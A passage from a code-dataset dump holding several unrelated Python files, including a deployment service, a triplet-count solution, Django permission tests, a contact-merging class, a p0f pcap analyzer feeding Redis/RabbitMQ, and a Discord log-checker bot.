deploy.project.after_deploy.replace(\"\\r\", \"\").replace(\n \"\\n\", \" && \")\n if after_deploy:\n cmd = after_deploy\n deploys.append_comment(deploy, \"exec {0}\\n\".format(cmd))\n f.remoted(cmd)\n time.sleep(10)\n deploys.append_comment(deploy, \"应用启动正常\\n\")\n deploys.append_comment(deploy, \"回滚完成,结束!\\n\")\n deploys.update(deploy, progress=100, status=4)\n\n except Exception as err:\n traceback.print_exc()\n deploys.append_comment(deploy, repr(err))\n deploys.update(deploy, progress=100, status=5)\n else:\n deploys.update(deploy, progress=100, status=1)\n finally:\n\n deploy = deploys.first(id=deploy_id)\n if deploy:\n deploys.deploy(deploy)\n\n\ndef iterfindfiles(path, fnexp):\n for root, dirs, files in os.walk(path):\n for warfile in fnmatch.filter(files, fnexp):\n yield os.path.join(root, warfile)\n\n\nclass DeploysService(object):\n def first(self, **kargs):\n # 返回一个object\n return Deploys.objects.filter(**kargs).get()\n\n def update(self, deploy, progress, status):\n deploy.progress = progress\n deploy.status = status\n deploy.save()\n\n def deploy(self, deploy):\n t = threading.Thread(target=deploy_thread,\n args=(deploy.project_id, deploy.id, deploys),\n name=\"pydelo-deploy[%d]\" % deploy.id)\n t.start()\n\n def rollback(self, deploy):\n t = threading.Thread(target=rollback_thread,\n args=(deploy.project_id, deploy.id, deploys),\n name=\"pydelo-rollback[%d]\" % deploy.id)\n t.start()\n\n def append_comment(self, deploy, comment):\n if deploy.comment:\n deploy.comment = str(deploy.comment) + comment\n else:\n deploy.comment = comment\n deploy.save()\n return deploy\n\n\ndeploys = DeploysService()\nrundeploys = DeploysService()\n","sub_path":"ops/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":11160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614861004","text":"#!/bin/python3\n\nimport sys\n\n'''\nClass to count number of items less then provided value.\nKeeps track of previous count for performance, traverses full list once.\n'''\nclass CachedCounter():\n\t'''\n\tInit with integer list\n\t'''\n\tdef __init__(self, lst):\n\t\tself.cachedCount = 0;\n\t\tself.index = 0;\n\t\tself.lst = sorted(lst);\n\t\tself.lastSearch = 0;\n\n\t'''\n\tReturns count of values in lst that are less or equal to\n\tthe provided integer.\n\n\tFor linear runtime, the first value provided should be the smallest\n\tand each proeceding value should be larger than the former.\n\t'''\n\tdef getCachedCount(self, q):\n\n\t\t# Bad case, resets cached counter.\n\t\tif (q < self.lastSearch):\n\t\t\tself.cachedCount = 0;\n\t\t\tself.index = 0;\n\t\t# If same value as last call, return same value\n\t\telif (q == self.lastSearch):\n\t\t\treturn self.cachedCount;\n\n\t\t# Retain count for smaller items, count up from last used index\n\t\tlastVal = 0;\n\t\tfor i in range(self.index, len(self.lst)):\n\t\t\tval = self.lst[i];\n\t\t\tif (val > q):\n\t\t\t\tbreak; # Done\n\t\t\tself.cachedCount += 1;\n\t\t\tself.index = i + 1; # offset, start at next index next time\n\n\t\tself.lastSearch = q;\n\t\treturn self.cachedCount;\n\n\t'''\n\tReturns print out of object for debuging\n\t'''\n\tdef __str__(self):\n\t\treturn \"Count:\" + str(self.cachedCount) +\\\n\t\t\", index:\" + str(self.index) +\\\n\t\t\" ,lastSearch:\" + str(self.lastSearch);\n\n\tdef __repr__(self):\n\t\treturn self.__str__();\n\n'''\nReturns count of unique \"sum\" triplets given 3 integer lists.\n'''\ndef triplets(a, b, c):\n\n\tb = sorted(set(b));\n\n\tcountFromA = CachedCounter(a);\n\tcountFromC = CachedCounter(c);\n\n\tcount = 0;\n\tfor val in b:\n\t\t# count values in a less or equal to val\n\t\tcountA = countFromA.getCachedCount(val);\n\t\tcountC = countFromC.getCachedCount(val);\n\t\tcount += countA * countC;\n\t\tlastVal = val;\n\n\treturn count;\n\n'''\nMain call provided as starter code for challenge:\n'''\nif __name__ == '__main__':\n\tfptr = sys.stdout;\n\n\tlenaLenbLenc = input().split()\n\n\tlena = int(lenaLenbLenc[0])\n\n\tlenb = int(lenaLenbLenc[1])\n\n\tlenc = int(lenaLenbLenc[2])\n\n\tarra = list(map(int, input().rstrip().split()))\n\n\tarrb = list(map(int, input().rstrip().split()))\n\n\tarrc = list(map(int, input().rstrip().split()))\n\n\tans = triplets(arra, arrb, arrc)\n\n\tfptr.write(str(ans) + '\\n')\n\n\tfptr.close()\n\n","sub_path":"python/challenges/tripleSum/tripleSum.py","file_name":"tripleSum.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315162424","text":"from Component import Component\n\n\nclass Leaf(Component):\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n self.children = []\n \n def move(self, x_distance : float, y_distance : float, k : int) -> None:\n print(k*'\\t' + f\"{type(self)} : ( {self.x}, {self.y} ) --> \", end=\"\")\n # Muevo al objeto hijo\n self.x += x_distance\n self.y += y_distance\n print(f\"( {self.x}, {self.y} )\")\n\n\n","sub_path":"CompositePython/GraphicsImplementation/Leaf.py","file_name":"Leaf.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"122999346","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom importlib import import_module\n\nfrom machine.utils.collections import CaseInsensitiveDict\n\n\ndef import_settings(settings_module=\"local_settings\"):\n default_settings = {\n \"PLUGINS\": [\n \"machine.plugins.builtin.general.PingPongPlugin\",\n \"machine.plugins.builtin.general.HelloPlugin\",\n \"machine.plugins.builtin.help.HelpPlugin\",\n \"machine.plugins.builtin.fun.memes.MemePlugin\",\n ],\n \"STORAGE_BACKEND\": \"machine.storage.backends.memory.MemoryStorage\",\n \"DISABLE_HTTP\": False,\n \"HTTP_SERVER_HOST\": \"0.0.0.0\",\n \"HTTP_SERVER_PORT\": 8080,\n \"HTTP_SERVER_BACKEND\": \"wsgiref\",\n \"HTTP_PROXY\": \"\",\n \"HTTPS_PROXY\": \"\",\n \"KEEP_ALIVE\": None,\n }\n settings = CaseInsensitiveDict(default_settings)\n try:\n local_settings = import_module(settings_module)\n found_local_settings = True\n except ImportError:\n found_local_settings = False\n else:\n for k in dir(local_settings):\n if not k.startswith(\"_\"):\n settings[k] = getattr(local_settings, k)\n\n for k, v in os.environ.items():\n if k[:3] == \"SM_\":\n k = k[3:]\n settings[k] = v\n\n return settings, found_local_settings\n","sub_path":"machine/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324721933","text":"import math\nimport pandas as panda\nimport matplotlib.pyplot as plt\n\ndata_field1 = panda.read_csv('Sensor.csv')\nx_value = data_field1['ORIENTATIONX']\ny_value = data_field1['ORIENTATIONY']\na_value = data_field1['LIGHT']\nz_value = data_field1['ORIENTATIONZ']\ntime = []\nmultiplicationxy = list()\nfor i in range(0, 392, 1):\n multiplicationxy.append(math.sqrt(math.pow(x_value[i], 2) +\n math.pow(y_value[i], 2))*10)\nfor j in range(0, 392, 1):\n time.append(j)\nplt.plot(time, multiplicationxy, 'r', label='XY Orientation')\nplt.plot(time, a_value, 'b', label='Light')\nplt.xlabel('Number of Samples')\nplt.ylabel('Light and Orientation')\nplt.title('Orientation of the Phone vs. Light')\nplt.legend(loc='upper left')\nplt.show()\n\n\n\n","sub_path":"Activity2.py","file_name":"Activity2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552214099","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2020 EMBL - European Bioinformatics Institute\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport pytest\n\nfrom django.core.urlresolvers import reverse\n\nfrom rest_framework import status\n\nfrom model_bakery import baker\n\nfrom test_utils.emg_fixtures import * # noqa\n\n\n@pytest.mark.django_db\nclass TestPermissionsAPI(object):\n\n @pytest.fixture(autouse=True)\n def setup_method(self, db):\n _biome = baker.make('emgapi.Biome', biome_name=\"foo\",\n lineage=\"root:foo\", pk=123)\n\n # Webin-000 public\n baker.make(\"emgapi.Study\", pk=111, secondary_accession=\"SRP0111\",\n is_public=1, submission_account_id='Webin-000',\n biome=_biome)\n baker.make(\"emgapi.Study\", pk=112, secondary_accession=\"SRP0112\",\n is_public=1, submission_account_id='Webin-000',\n biome=_biome)\n # Webin-000 private\n baker.make(\"emgapi.Study\", pk=113, secondary_accession=\"SRP0113\",\n is_public=0, submission_account_id='Webin-000',\n biome=_biome)\n\n # Webin-111 public\n baker.make(\"emgapi.Study\", pk=114, secondary_accession=\"SRP0114\",\n is_public=1, submission_account_id='Webin-111',\n biome=_biome)\n # Webin-111 private\n baker.make(\"emgapi.Study\", pk=115, secondary_accession=\"SRP0115\",\n is_public=0, submission_account_id='Webin-111',\n biome=_biome)\n\n # unknown public\n baker.make(\"emgapi.Study\", pk=120, secondary_accession=\"SRP0120\",\n is_public=1, submission_account_id=None, biome=_biome)\n # unknown private\n baker.make(\"emgapi.Study\", pk=121, secondary_accession=\"SRP0121\",\n is_public=0, submission_account_id=None, biome=_biome)\n\n @pytest.mark.parametrize(\n 'view, username, count, ids, bad_ids',\n [\n # private\n ('emgapi_v1:studies-list', 'Webin-111', 5,\n ['MGYS00000111', 'MGYS00000112', 'MGYS00000114', 'MGYS00000115',\n 'MGYS00000120'],\n ['MGYS00000113', 'MGYS00000121']),\n # mydata\n ('emgapi_v1:mydata-list', 'Webin-111', 2,\n ['MGYS00000114', 'MGYS00000115'],\n []),\n # public\n ('emgapi_v1:studies-list', None, 4,\n ['MGYS00000111', 'MGYS00000112', 'MGYS00000114', 'MGYS00000120'],\n ['MGYS00000113', 'MGYS00000115', 'MGYS00000121']),\n ]\n )\n def test_list(self, apiclient, view, username, count, ids, bad_ids):\n auth = None\n if username is not None:\n data = {\n \"username\": username,\n \"password\": \"secret\",\n }\n rsp = apiclient.post(\n reverse('obtain_jwt_token_v1'), data=data, format='json')\n token = rsp.json()['data']['token']\n auth = 'Bearer {}'.format(token)\n\n url = reverse(view)\n if auth is not None:\n response = apiclient.get(url, HTTP_AUTHORIZATION=auth)\n else:\n response = apiclient.get(url)\n assert response.status_code == status.HTTP_200_OK\n rsp = response.json()\n\n # Meta\n assert rsp['meta']['pagination']['page'] == 1\n assert rsp['meta']['pagination']['pages'] == 1\n assert rsp['meta']['pagination']['count'] == count\n\n # Data\n assert len(rsp['data']) == count\n assert set(ids) - set([d['id'] for d in rsp['data']]) == set()\n\n ids.extend(bad_ids)\n assert set(ids) - set([d['id'] for d in rsp['data']]) == set(bad_ids)\n\n def test_detail(self, apiclient):\n data = {\n \"username\": \"Webin-000\",\n \"password\": \"secret\",\n }\n rsp = apiclient.post(\n reverse('obtain_jwt_token_v1'), data=data, format='json')\n token = rsp.json()['data']['token']\n\n url = reverse(\"emgapi_v1:studies-detail\", args=['SRP0113'])\n response = apiclient.get(\n url, HTTP_AUTHORIZATION='Bearer {}'.format(token))\n assert response.status_code == status.HTTP_200_OK\n rsp = response.json()\n\n assert rsp['data']['id'] == 'MGYS00000113'\n\n url = reverse(\"emgapi_v1:studies-detail\", args=['MGYS00000115'])\n response = apiclient.get(\n url, HTTP_AUTHORIZATION='Bearer {}'.format(token))\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n url = reverse(\"emgapi_v1:studies-detail\", args=['MGYS00000121'])\n response = apiclient.get(\n url, HTTP_AUTHORIZATION='Bearer {}'.format(token))\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n @pytest.mark.parametrize('accession', [\n 'MGYS00000113', 'MGYS00000115', 'MGYS00000121',\n 'SRP0113', 'SRP0115', 'SRP0121'\n ])\n def test_not_found(self, apiclient, accession):\n url = reverse(\"emgapi_v1:studies-detail\", args=[accession])\n response = apiclient.get(url)\n assert response.status_code == status.HTTP_404_NOT_FOUND\n","sub_path":"tests/api/test_permissions.py","file_name":"test_permissions.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243441747","text":"import class_utils\n\n\nclass ContactUtils:\n # EXCLUDED_MERGE_ATTRIBUTES: All Contact attribute we don't want to use when merging two or more Contact objects.\n EXCLUDED_MERGE_ATTRIBUTES = ['prefix', 'name', 'first_name', 'last_name', 'suffix', 'nickname', 'company', 'job_title',\n 'birthday', 'gender', 'relationship', 'notes']\n LIST_ATTRIBUTES = ['company', 'job_title']\n\n def __init__(self):\n pass\n\n\nclass Contact:\n\n def __init(self):\n self.contact_id = -1\n self.prefix = \"\"\n self.name = \"\"\n self.first_name = \"\"\n self.last_name = \"\"\n self.suffix = \"\"\n self.nickname = \"\"\n self.birthday = \"\"\n self.gender = \"\"\n self.relationship = \"\"\n self.company = []\n self.job_title = []\n self.email = []\n self.phone = []\n self.addresses = []\n self.notes = []\n self.website = []\n self.twitter = []\n self.linkedin = []\n self.facebook = []\n self.instagram = []\n\n def __hash__(self):\n hash_code = 0\n if self.company and len(self.company) > 0:\n for company in self.company:\n hash_code += hash(company)\n\n if self.job_title and len(self.job_title) > 0:\n for job_title in self.job_title:\n hash_code += hash(job_title)\n\n if self.email and len(self.email) > 0:\n for email in self.email:\n hash_code += hash(email)\n\n if self.phone and len(self.phone) > 0:\n for phone in self.phone:\n hash_code += hash(phone)\n\n if self.addresses and len(self.addresses) > 0:\n for address in self.addresses:\n hash_code += hash(address)\n\n if self.notes and len(self.notes) > 0:\n for note in self.notes:\n hash_code += hash(note)\n\n if self.website and len(self.website) > 0:\n for website in self.website:\n hash_code += hash(website)\n\n if self.twitter and len(self.twitter) > 0:\n for twitter in self.twitter:\n hash_code += hash(twitter)\n\n if self.linkedin and len(self.linkedin) > 0:\n for linkedin in self.linkedin:\n hash_code += hash(linkedin)\n\n if self.facebook and len(self.facebook) > 0:\n for facebook in self.facebook:\n hash_code += hash(facebook)\n\n if self.instagram and len(self.instagram) > 0:\n for instagram in self.instagram:\n hash_code += hash(instagram)\n\n hash_code += hash(self.contact_id)\n hash_code += hash(self.prefix)\n hash_code += hash(self.name)\n hash_code += hash(self.first_name)\n hash_code += hash(self.last_name)\n hash_code += hash(self.suffix)\n hash_code += hash(self.nickname)\n hash_code += hash(self.birthday)\n hash_code += hash(self.gender)\n\n return hash_code\n\n @classmethod\n def init_from_icloud_csv_row(cls, row):\n cls.prefix = row.get('Name Prefix', '')\n cls.name = row.get('Name', '')\n cls.first_name = row.get('Given Name', '')\n cls.last_name = row.get('Family Name', '')\n cls.suffix = row.get('Name Suffix', '')\n cls.nickname = row.get('Nickname', '')\n cls.birthday = row.get('Birthday', '')\n cls.gender = row.get('Gender', '')\n\n cls.company = []\n\n if row.get(row.get('Organization Name', '')):\n cls.company.append(row.get('Organization Name', ''))\n\n cls.website = []\n\n if row.get('Website 1 - Value', ''):\n cls.website.append(row.get('Website 1 - Value', ''))\n\n cls.email = []\n\n if row.get('Email 1 - Value', ''):\n cls.email.append(row['Email 1 - Value'])\n\n if row.get('Email 2 - Value', ''):\n cls.email.append(row['Email 2 - Value'])\n\n if row.get('Email 3 - Value', ''):\n cls.email.append(row['Email 3 - Value'])\n\n cls.phone = []\n\n if row.get('Phone 1 - Value', ''):\n cls.phone.append(row['Phone 1 - Value'])\n\n if row.get('Phone 2 - Value', ''):\n cls.phone.append(row['Phone 2 - Value'])\n\n if row.get('Phone 3 - Value', ''):\n cls.phone.append(row['Phone 3 - Value'])\n\n cls.addresses = []\n\n if row.get('Address 1 - Value', ''):\n cls.addresses.append(row['Phone 3 - Value'])\n\n cls.contact_id = hash(cls)\n return cls\n\n @classmethod\n def init_from_apple_vcard(cls, vcard):\n cls.name = vcard.get('fn', '')\n cls.birthday = vcard.get('bday', '')\n\n cls.phone = []\n\n if vcard.get('tel'):\n cls.phone.append(vcard.get('tel'))\n\n cls.email = []\n\n if vcard.get('email'):\n cls.email.append(vcard.get('email'))\n\n cls.notes = []\n\n if vcard.get('note'):\n cls.notes.append(vcard.get('note'))\n\n cls.job_title = []\n\n if vcard.get('title'):\n cls.job_title.append(vcard.get('title'))\n\n cls.website = []\n\n if vcard.get('url'):\n cls.website.append(vcard.get('url'))\n\n cls.contact_id = hash(cls)\n\n return cls\n\n @classmethod\n def init_from_merging_two_contacts(cls, c1, c2):\n # TODO: How do we handle two contacts having different values for the same param?\n # TODO: Create method to handle choosing an attribute value from one of the Contact objects.\n attributes = class_utils.get_class_attributes(Contact())\n new_c = Contact()\n\n # Go through each attribute for Contact, and set with a value.\n for attribute in attributes:\n # Neither Contact() objects have this attribute, skip it\n if not class_utils.is_one_class_with_attribute(c1, c2, attribute):\n continue\n\n # Both Contact() objects have this attribute,\n # we'll append unique values from lists, and compare strings for likeness.\n # Each attribute type should have it's own validator, but for now, we'll just choose whichever string has\n # multiple strings.\n # TODO: give each attribute it's own validator/selector method\n if class_utils.both_classes_have_none_null_attributes(c1, c2, attribute):\n # TODO: figure out how to handle this case\n # String vs List\n continue\n pass\n\n # Only one of Contact() objects have this attribute, so we'll figure out which one and use it's value.\n setattr(new_c, attribute, class_utils.get_attribute_from_class(c1, c2, attribute))\n\n new_c.contact_id = hash(new_c)\n return new_c\n","sub_path":"contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":6747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358537763","text":"#! /usr/bin/env python3\n\nimport sys\n\ndict_input = sys.argv[1:]\n\ninput_dict = {}\n\nfor i in range(len(dict_input)):\n temp_input = dict_input[i].split(':')\n# print(temp_input)\n input_dict[temp_input[0]] = temp_input[1]\n\nfor key,value in input_dict.items():\n print('ID:',key,'Name:',value)\n \n\n\n\n\n\n\n\n","sub_path":"test/dicttest1.py","file_name":"dicttest1.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105903799","text":"import datetime\nimport json\nimport os\nimport sys\nimport time\n\nimport pika\nimport redis\n\n\ndef connect_rabbit(host='messenger', port=5672, queue='task_queue'):\n params = pika.ConnectionParameters(host=host, port=port)\n connection = pika.BlockingConnection(params)\n channel = connection.channel()\n channel.queue_declare(queue=queue, durable=True)\n return channel\n\ndef send_rabbit_msg(msg, channel, exchange='', routing_key='task_queue'):\n channel.basic_publish(exchange=exchange,\n routing_key=routing_key,\n body=json.dumps(msg),\n properties=pika.BasicProperties(\n delivery_mode=2,\n ))\n print(\" [X] %s UTC %r %r\" % (str(datetime.datetime.utcnow()),\n str(msg['id']), str(msg['file_path'])))\n return\n\ndef get_version():\n version = ''\n with open('VERSION', 'r') as f:\n for line in f:\n version = line.strip()\n return version\n\ndef run_p0f(path):\n os.system('/usr/bin/p0f -r ' + path + ' -o /tmp/p0f_output.txt > /dev/null')\n return\n\ndef run_tshark(path):\n os.system('/usr/bin/tshark -r ' + path + ' -T fields -e ip.src -e eth.src | sort | uniq > /tmp/tshark_output.txt')\n os.system('/usr/bin/tshark -r ' + path + ' -T fields -e ip.dst -e eth.dst | sort | uniq >> /tmp/tshark_output.txt')\n return\n\ndef parse_output():\n results = {}\n with open('/tmp/p0f_output.txt', 'r') as f:\n for line in f:\n l = \" \".join(line.split()[2:])\n l = l.split('|')\n if l[0] == 'mod=syn':\n results[l[1].split('cli=')[1].split('/')[0]] = {'full_os': l[4].split('os=')[1], 'short_os': l[4].split('os=')[1].split()[0]}\n with open('/tmp/tshark_output.txt', 'r') as f:\n for line in f:\n pair = line.split()\n if len(pair) == 2:\n if pair[0] in results:\n results[pair[0]]['mac'] = pair[1]\n return results\n\ndef connect():\n r = None\n try:\n r = redis.StrictRedis(host='redis', port=6379, db=0)\n except Exception as e: # pragma: no cover\n try:\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n except Exception as e: # pragma: no cover\n print('Unable to connect to redis because: ' + str(e))\n return r\n\ndef save(r, results):\n timestamp = str(int(time.time()))\n if r:\n try:\n if isinstance(results, list):\n for result in results:\n for key in result:\n redis_k = {}\n for k in result[key]:\n redis_k[k] = str(result[key][k])\n r.hmset(key, redis_k)\n r.hmset('p0f_'+timestamp+'_'+key, redis_k)\n r.sadd('ip_addresses', key)\n r.sadd('p0f_timestamps', timestamp)\n elif isinstance(results, dict):\n for key in results:\n redis_k = {}\n for k in results[key]:\n redis_k[k] = str(results[key][k])\n r.hmset(key, redis_k)\n r.hmset('p0f_'+timestamp+'_'+key, redis_k)\n r.sadd('ip_addresses', key)\n r.sadd('p0f_timestamps', timestamp)\n except Exception as e: # pragma: no cover\n print('Unable to store contents of p0f: ' + str(results) +\n ' in redis because: ' + str(e))\n return\n\ndef main():\n pcap_paths = []\n path = sys.argv[1]\n if os.path.isdir(path):\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".pcap\") or file.endswith(\".pcapng\") or file.endswith(\".dump\") or file.endswith(\".capture\"):\n pcap_paths.append(os.path.join(root, file))\n else:\n pcap_paths.append(path)\n\n for path in pcap_paths:\n run_p0f(path)\n run_tshark(path)\n results = parse_output()\n print(results)\n\n if 'redis' in os.environ and os.environ['redis'] == 'true':\n r = connect()\n save(r, results)\n\n uid = ''\n if 'id' in os.environ:\n uid = os.environ['id']\n if 'rabbit' in os.environ and os.environ['rabbit'] == 'true':\n try:\n channel = connect_rabbit()\n body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': results, 'results': {'tool': 'p0f', 'version': get_version()}}\n send_rabbit_msg(body, channel)\n body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': '', 'results': {'tool': 'p0f', 'version': get_version()}}\n send_rabbit_msg(body, channel)\n except Exception as e:\n print(str(e))\n return\n\nif __name__ == \"__main__\": # pragma: no cover\n main()\n","sub_path":"p0f/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598383629","text":"import re\n\ndef sentence_spliter(file_name):\n input_text = re.sub(r\"^\\n\", \"\", open(file_name, encoding=\"utf8\").read())\n chr_list = list(input_text)\n s_start = 0\n for match in re.finditer(r\"([.;:?!]) ([A-Z])\", input_text):\n s_end = match.start()\n edit_text = chr_list[s_start:s_end+1] + [\"\\n\"]\n s_start = s_end + 2\n yield \"\".join(edit_text)\n\nif __name__ == \"__main__\":\n for sentence in sentence_spliter(\"nlp.txt\"):\n print(sentence)","sub_path":"hirao/chapter06/knock50.py","file_name":"knock50.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517301311","text":"class Person:\n def __init__(self, name, age):\n self.__name = name\n self.age = age\n\n def growUp(self) ->int:# 这个int只起提示作用,相当于注释\n self.age += 1\n return self.__name + \":我长大啦一岁!\"\n\n def __str__(self):\n return self.__name + \":\" + str(self.age)\n\n\np1 = Person(\"riguang\", 22)\nprint(p1)\nmsg = p1.growUp()\nprint(msg)\nprint(p1)\nprint(p1.age)\n","sub_path":"Python_Study/class_study.py","file_name":"class_study.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"564139910","text":"from behave import *\nfrom pyhabit import hrpg\n\nuse_step_matcher(\"re\")\n\n@given(\"I just reset my account\")\ndef step_impl(context):\n context.user = hrpg.User('0ae9d6b0-c729-4533-bfe1-ac22209eb93e',\n 'd3edcc7c-27b9-435d-91a0-e19706430413')\n context.user.reset( )","sub_path":"pyhabit/tests/steps/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"29450888","text":"from pwn import *\n\nio=remote('pynotes.darkarmy.xyz',32769)\n\n\n#io = process(\"./a.out\",env={\"LD_PRELOAD\":\"./libc.so.6\"})\n\nre = lambda a: io.recv(a)\nru = lambda a: io.recvuntil(a)\nrl = lambda : io.recvline()\ns = lambda a: io.send(a)\nsl = lambda a: io.sendline(a)\nsla= lambda a,b: io.sendlineafter(a,b)\nsa = lambda a,b: io.sendafter(a,b)\n\n\n#gdb.attach(io)\n#io.interactive()\n\n\n#\"\"\"\nif __name__ == '__main__':\n sla('\\n','new(0,0x80,1234)')\n for i in range(1,9):\n sl('new(' + str(i) + ',0x80,1234)')\n sl(\"new(9,10,12345)\")\n for i in range(9):\n sl('delete(' + str(i) + ')')\n sl('leak = view(8)')\n sl('leak=leak-4111520')\n sl('binsh = 0x0068732f6e69622f')\n sl('fun = leak + 0x4f4e0')\n sl('hook = leak + 0x3ed8e8')\n sl(\"new(0,0x60,12345)\")\n sl(\"print(leak)\")\n sl(\"print(hook)\")\n sl(\"delete(0)\")\n sl(\"delete(0)\")\n sl(\"delete(0)\")\n sl(\"new(2,0x60,hook)\")\n sl(\"new(3,0x60,binsh)\")\n sl(\"new(4,0x60,fun)\")\n sl(\"print(view(4))\")\n sl(\"delete(3)\")\n sl(\"DARKCTF\")\n io.interactive()\n#\"\"\"\n","sub_path":"dark20/pynote/distribute/share/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336903290","text":"try:\n from api import ApiVK\nexcept ImportError:\n from api.photos.vk.api import ApiVK\n\n\nclass ExtractorVK:\n def __init__(self, api=ApiVK()):\n if not isinstance(api, ApiVK):\n raise NotImplemented\n self.api = api\n\n def get_photos(self, user_id: int, **params):\n method = 'photos.get'\n default_params = {\n 'album_id': 'profile',\n 'extended': 1,\n 'owner_id': user_id,\n **params\n }\n\n content = self.api.get(method, **default_params).json()\n if 'error' in content:\n raise ValueError(f'Некорретные данные запроса фотографии: {content[\"error\"]}')\n return content\n\n\nif __name__ == \"__main__\":\n params = {\n 'album_id': 'profile',\n }\n extractor = ExtractorVK()\n print(extractor.get_photos(552934290, **params))\n","sub_path":"api/photos/vk/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"422259017","text":"#!/usr/bin/env python3\n\nimport discord, sys, traceback, io, os, asyncio, re\nfrom bot_utils import setup, send_msg\nfrom datetime import datetime, timedelta\nfrom subprocess import Popen, PIPE\n\n\"\"\"\nlog-checker checks the docker logs for siad.\n\nArguments:\n 1. path to a .env file (default is none so env variables can already be\n preset)\n\n 2. docker container name name (default: \"sia\")\n\n 3. number of hours to look back in log (default: 1 hour)\n\n\"\"\"\n\n# Get the container name as an argument or use \"sia\" as default.\nCONTAINER_NAME = \"sia\"\nif len(sys.argv) > 2:\n CONTAINER_NAME = sys.argv[2]\n\n# Get the number of hours to look back in the logs or use 1 as default.\nCHECK_HOURS = 1\nif len(sys.argv) > 3:\n CHECK_HOURS = int(sys.argv[3])\n\n# Discord messages have a limit on their length set at 2000 bytes. We use\n# a lower limit in order to leave some space for additional message text.\nDISCORD_MAX_MESSAGE_LENGTH = 1900\n\nbot_token = setup()\nclient = discord.Client()\n\n\n# exit_after kills the script if it hasn't exited on its own after `delay` seconds\nasync def exit_after(delay):\n await asyncio.sleep(delay)\n os._exit(0)\n\n\n@client.event\nasync def on_ready():\n await run_checks()\n asyncio.create_task(exit_after(3))\n\n\nasync def run_checks():\n print(\"Running Skynet portal log checks\")\n try:\n await check_load_average()\n await check_docker_logs()\n\n except: # catch all exceptions\n trace = traceback.format_exc()\n await send_msg(client, \"```\\n{}\\n```\".format(trace), force_notify=False)\n\n\n# check_load_average monitors the system's load average value and issues a\n# warning message if it exceeds 10.\nasync def check_load_average():\n uptime_string = os.popen(\"uptime\").read().strip()\n # pattern = \"\"\n if sys.platform == \"Darwin\":\n pattern = \"^.*load averages: \\d*\\.\\d* \\d*\\.\\d* (\\d*\\.\\d*)$\"\n else:\n pattern = \"^.*load average: \\d*\\.\\d*, \\d*\\.\\d*, (\\d*\\.\\d*)$\"\n load_av = re.match(pattern, uptime_string).group(1)\n if float(load_av) > 10:\n await send_msg(client, \"High system load detected: `uptime: {}`\".format(uptime_string), force_notify=True)\n\n# check_docker_logs checks the docker logs by filtering on the docker image name\nasync def check_docker_logs():\n print(\"\\nChecking docker logs...\")\n\n now = datetime.now()\n time = now - timedelta(hours=CHECK_HOURS)\n time_string = \"{}h\".format(CHECK_HOURS)\n\n # Read the logs.\n print(\"[DEBUG] Will run `docker logs --since {} {}`\".format(time_string, CONTAINER_NAME))\n proc = Popen([\"docker\", \"logs\", \"--since\", time_string, CONTAINER_NAME], stdin=PIPE, stdout=PIPE, stderr=PIPE, text=True)\n std_out, std_err = proc.communicate()\n\n if len(std_err) > 0:\n # Trim the error log to under 1MB.\n one_mb = 1024*1024\n if len(std_err) > one_mb:\n pos = std_err.find(\"\\n\", -one_mb)\n std_err = std_err[pos+1:]\n upload_name = \"{}-{}-{}-{}-{}:{}:{}_err.log\".format(CONTAINER_NAME, time.year, time.month, time.day, time.hour, time.minute, time.second)\n await send_msg(client, \"Error(s) found in log!\", file=discord.File(io.BytesIO(std_err.encode()), filename=upload_name), force_notify=True)\n # Send at most DISCORD_MAX_MESSAGE_LENGTH characters of logs, rounded\n # down to the nearest new line. This 